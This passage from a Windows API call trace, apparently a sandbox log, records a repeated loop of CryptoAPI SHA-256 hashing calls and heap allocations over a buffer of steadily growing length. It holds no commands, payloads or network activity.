	[0118.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbdc0
	[0118.526] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbdc0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbdc0, pdwDataLen=0x129364) returned 1
	[0118.526] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.526] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.526] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.526] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.527] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0118.527] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbde8
	[0118.527] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbde8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbde8, pdwDataLen=0x129364) returned 1
	[0118.527] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.527] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.527] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.527] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.527] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0118.527] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbe10
	[0118.527] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbe10, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbe10, pdwDataLen=0x129364) returned 1
	[0118.527] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.527] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.527] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.527] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.527] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0118.528] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbe38
	[0118.528] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbe38, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbe38, pdwDataLen=0x129364) returned 1
	[0118.528] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.528] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.528] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.528] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.528] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0118.528] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbe60
	[0118.528] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbe60, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbe60, pdwDataLen=0x129364) returned 1
	[0118.528] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.528] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.528] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.528] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.528] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0118.529] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbe88
	[0118.529] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbe88, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbe88, pdwDataLen=0x129364) returned 1
	[0118.529] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.529] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.529] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.529] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.529] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0118.529] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbeb0
	[0118.529] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbeb0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbeb0, pdwDataLen=0x129364) returned 1
	[0118.529] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.529] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.529] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.530] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.530] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0118.530] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.530] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbed8
	[0118.530] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbed8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbed8, pdwDataLen=0x129364) returned 1
	[0118.530] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.530] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.530] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.530] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.530] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0118.530] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.530] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbf00
	[0118.530] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbf00, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbf00, pdwDataLen=0x129364) returned 1
	[0118.530] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.530] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.530] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.531] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.531] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0118.531] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbf28
	[0118.531] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbf28, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbf28, pdwDataLen=0x129364) returned 1
	[0118.531] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.531] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.531] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.531] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.531] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0118.531] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbf50
	[0118.531] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbf50, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbf50, pdwDataLen=0x129364) returned 1
	[0118.531] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.531] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.531] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.532] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.532] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0118.532] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.532] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbf78
	[0118.532] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbf78, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbf78, pdwDataLen=0x129364) returned 1
	[0118.532] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.532] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.532] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.532] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.532] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0118.532] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.532] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbfa0
	[0118.532] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbfa0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbfa0, pdwDataLen=0x129364) returned 1
	[0118.532] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.532] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.532] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.533] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.533] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0118.533] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.533] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbfc8
	[0118.533] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbfc8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbfc8, pdwDataLen=0x129364) returned 1
	[0118.533] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.533] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.533] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.533] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.533] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0118.533] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.533] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbff0
	[0118.533] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbff0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbff0, pdwDataLen=0x129364) returned 1
	[0118.533] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.533] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.533] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.534] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.534] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0118.534] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.534] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc018
	[0118.534] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc018, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc018, pdwDataLen=0x129364) returned 1
	[0118.534] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.534] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.534] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.534] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.534] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0118.534] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.534] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc040
	[0118.534] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc040, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc040, pdwDataLen=0x129364) returned 1
	[0118.534] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.534] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.534] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.535] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.535] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0118.535] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.535] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc068
	[0118.535] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc068, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc068, pdwDataLen=0x129364) returned 1
	[0118.535] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.535] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.535] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.535] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.535] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0118.535] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.535] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc090
	[0118.535] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc090, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc090, pdwDataLen=0x129364) returned 1
	[0118.535] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.535] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.535] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.536] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.536] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0118.536] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.536] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc0b8
	[0118.536] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc0b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc0b8, pdwDataLen=0x129364) returned 1
	[0118.536] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.536] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.536] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.536] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.536] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0118.536] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.536] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc0e0
	[0118.536] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc0e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc0e0, pdwDataLen=0x129364) returned 1
	[0118.536] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.536] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.536] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.537] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.537] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0118.537] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.537] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc108
	[0118.537] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc108, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc108, pdwDataLen=0x129364) returned 1
	[0118.537] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.537] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.537] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.537] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.537] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0118.537] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.537] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc130
	[0118.537] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc130, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc130, pdwDataLen=0x129364) returned 1
	[0118.537] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.537] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.537] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.538] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.538] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0118.538] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.538] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc158
	[0118.538] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc158, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc158, pdwDataLen=0x129364) returned 1
	[0118.538] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.538] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.538] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.538] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.538] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0118.538] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.538] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc180
	[0118.538] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc180, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc180, pdwDataLen=0x129364) returned 1
	[0118.538] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.538] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.538] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.539] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.539] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0118.539] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc1a8
	[0118.539] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc1a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc1a8, pdwDataLen=0x129364) returned 1
	[0118.539] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.539] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.539] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.539] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.539] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x8a0, dwFlags=0x0) returned 1
